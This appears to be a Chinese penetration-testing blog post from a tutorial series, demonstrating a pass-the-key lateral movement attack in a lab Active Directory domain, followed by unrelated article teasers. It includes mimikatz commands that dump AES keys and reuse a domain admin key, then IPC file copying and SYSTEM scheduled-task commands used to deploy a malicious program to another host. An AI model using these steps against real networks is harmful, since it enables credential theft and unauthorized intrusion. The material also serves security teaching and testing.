当前位置：首页 > news >正文

内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击

news 2025/7/7 20:55:06

系列文章第一章节之基础知识篇

内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透(二)之基础知识-工作组介绍
内网渗透(三)之基础知识-域环境的介绍和优点
内网渗透(四)之基础知识-搭建域环境
内网渗透(五)之基础知识-Active Directory活动目录介绍和使用
内网渗透(六)之基础知识-域中的权限划分和基本思想
内网渗透(七)之基础知识-企业常见安全域划分和结构
内网渗透(八)之基础知识-企业域中计算机分类和专业名

系列文章第二章节之内网信息收集篇

内网渗透(九)之内网信息收集-手动本地信息收集
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
内网渗透(十一)之内网信息收集-内网IP扫描和发现
内网渗透(十二)之内网信息收集-内网端口扫描和发现
内网渗透(十三)之内网信息收集-收集域环境中的基本信息
内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息
内网渗透(十五)之内网信息收集-域环境中定位域管理员
内网渗透(十六)之内网信息收集-powershell基础知识
内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位

系列文章第三章节之Windows协议认证和密码抓取篇

内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希）
内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议)
内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议)
内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式
内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式
内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash
内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取
内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施

系列文章第四章节之横向移动篇

内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动
内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动
内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动
内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动

注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！

pass the key 密钥传递攻击(PTK)横向攻击

PTK介绍

WinXP/2003/Vista/2008 ，以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012，这些环境我们都可以使用NTLM哈希传递

对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NTLM来进行验证

什么是KB2871997

KB2871997：禁止本地管理员账户用于远程连接，这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。

这个补丁发布后常规的Pass The Hash已经无法成功，唯独默认的 Administrator (SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程连接，即使administrator修改了名字

但是还可以通过AES密钥来替代NTLM验证进行横向的操作，其实这个补丁挺鸡肋的，不用AES密钥照样也可以用NTLM，只是需要Administrator（SID 500），都拿到机器了，Administrator还不容易吗？这个补丁唯一的好处就是减少存储在内存中的凭据数据，也就是让wdigest协议认证的凭据不会存储在lsass.exe，这样子当你dump lsass.exe的时候你就会发现，wdigest协议中的凭据你就看不到了！

实验复现

实验环境

机器名	登录用户	IP
Windows 2012（域控）	administrator（域管理员）	192.168.41.10
windows 2012-2(域内主机)	administrator（本地管理员）	192.168.41.15
Windows 10（域内主机）	administrator（本地管理员）	192.168.41.14

实验前提

我们已经控制了2012-2主机，发现他是administrator本地用户登录系统，通过抓取密码发现域管账号存在内存中，但是没有明文，PTH攻击也失效，这个时候采用PTK攻击

实验步骤

通过各种方式先拿到2012-2主机的权限

在这里插入图片描述

然后我们通过Mimikatz去抓取密码

sekurlsa::ekeys

在这里插入图片描述

成功抓取到域管理员用户的aes265_hmac密码

在这里插入图片描述

利用pass the key 密钥传递攻击(PTK)进行横向攻击

mimikatz sekurlsa::pth /user:administrator /domain:hack.com /aes256:618c111cdcfd83adec90ea4866dba426f6b2362484ea4626fb1ee9b43bd2f85b

在这里插入图片描述

命令执行完成后，会在我们控制的机器上弹出一个cmd的窗口：

在这里插入图片描述

这个弹窗由于有了域管理员用户的票据，所以我们可以访问win10电脑了

在这里插入图片描述
接下来我们去建立IPC链接建立计划任务上线win10

在这里插入图片描述

这个程序是我们放置在2012-2机器上的恶意程序，接下来我们把它拷贝到win10机器上

copy 恶意文件 \\机器名\C$
#注意这里不能写IP地址，一定要写机器名

在这里插入图片描述

schtasks命令创建计划任务：

schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f

在这里插入图片描述

schtasks命令执行计划任务：

schtasks /run /s IP地址 /i /tn "计划任务名"

在这里插入图片描述

目标机器win10成功上线

在这里插入图片描述

内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…...

编程日记 2023/2/18 12:56:50

教你快速学会画动漫人物表情

动漫人物表情画法，3分钟教你快速学会画表情，快来跟我一起零成本学板绘吧！咱们的免费板绘系列教程又来啦，今天教大家的板绘技能是什么呢？今天的板绘学习教程来教你如何画动漫女生的表情！ 板绘动漫女生的表情…...

编程日记 2023/2/18 12:55:46

Qt系列：调用Edge浏览器示例

背景需要解决以下几个问题政府项目新浏览器兼容老系统ActiveX控件，Qt WebEngineView没有直接的实现方案，需要利用Qt的ActiveX兼容模块与浏览器往返多次交互Qt ActiveX未实现COM事件通知官方Win32示例存在滥用lambda函数的嫌疑，lambda函数…...

编程日记 2023/2/18 12:54:41

内推|香港外企急招ETL工程师！数据分析师+Python开发+运营专家

2月已过半还在找工作？快来看看有没有适合你的岗位！01公司：友邦科技工作地点：成都市高新区OCG国际中心招聘岗位：ETL工程师 15-18k该岗位为香港项目，需要有数仓或者大数据经验。本科IT或数据相关专业&#…...

编程日记 2023/2/18 12:53:32

zlib压缩原理

数据压缩的本质去除数据中的冗余信息，对于ABABABABABABAB字样的字符串，AB出现了7次，占用14个字节，如果将该字符串编码为7AB，只占用3个字节。为什么需要对数据压缩数据需要存储或者传输，为了节省磁盘空…...

编程日记 2023/2/18 12:52:24

论文阅读笔记《DEEP GRAPH MATCHING CONSENSUS》

核心思想本文提出一种基于图神经网络的图匹配方法，首先利用节点相似度构建初始的匹配关系，然后利用局部的一致性对初始的匹配关系进行迭代优化，不断筛除误匹配点，得到最终的匹配结果。本文还提出几种措施来降低计算复杂度&#x…...

编程日记 2023/2/18 12:51:19

华为OD机试题 - 开放日活动（JavaScript）

最近更新的博客 2023新华为OD机试题 - 斗地主（JavaScript）2023新华为OD机试题 - 箱子之形摆放（JavaScript）2023新华为OD机试题 - 考古学家（JavaScript）2023新华为OD机试题 - 相同数字的积木游戏 1（JavaScript）2023新华为OD机试题 - 最多等和不相交连续子序列（JavaScri…...

编程日记 2023/2/18 12:50:10

（考研湖科大教书匠计算机网络）第四章网络层-第八节：网际控制报文协议ICMP

获取pdf：密码7281专栏目录首页：【专栏必读】考研湖科大教书匠计算机网络笔记导航文章目录一：网际控制报文协议ICMP（1）ICMP差错报告报文A：终点不可达B：源点抑制C：时间超过D&#xff…...

编程日记 2023/2/18 12:49:05

华为OD机试 - GPU 调度 | 备考思路，刷题要点，答疑【新解法】

最近更新的博客【新解法】华为OD机试 - 关联子串 | 备考思路，刷题要点，答疑，od Base 提供【新解法】华为OD机试 - 停车场最大距离 | 备考思路，刷题要点，答疑，od Base 提供【新解法】华为OD机试 - 任务调度 | 备考思路，刷题要点，答疑，od Base 提供【新解法】华为OD机试…...

编程日记 2023/2/18 12:48:00

华为OD机试题 - 任务总执行时长（JavaScript）

编程日记 2023/2/18 12:46:55

还在想假期去哪玩?直接做一个旅游攻略小程序

憋了几年好不容易解封准备出去散散心，但看着大江南北这么多景点是不是有点让你选择强迫症呢？那就先制作一个旅游攻略小程序看看驴友们的分享吧。...

编程日记 2023/2/18 12:45:49

十四、vue3项目如何使用three.js

近期在开发过程中，因为项目已经接近尾声，就需要对项目中的数据进行整合，而数据看板不失为一个比较直观的展现形式。在数据看板中3D的展现形式是比较流行的展现形式，那么如何在项目引入一个大的场景，并且能够和后台发生…...

编程日记 2023/2/18 12:44:44

python 向excel表中添加新的sheet页或者向旧sheet中写入数据

import xlwt import xlrd from xlutils.copy import copy import os import numpy as np import pandas as pd class Excel_Add_Sheet():def save_table(self, table, file_name):# 保存表table.save(file_name)def add_new_sheet(self, file_name, sheet_name, titleNone):&q…...

编程日记 2023/2/18 12:43:38

系列文章第一章节之基础知识篇

系列文章第二章节之内网信息收集篇

系列文章第三章节之Windows协议认证和密码抓取篇

系列文章第四章节之横向移动篇

pass the key 密钥传递攻击(PTK)横向攻击

PTK介绍

什么是KB2871997

实验复现

实验环境

实验前提

实验步骤

相关文章：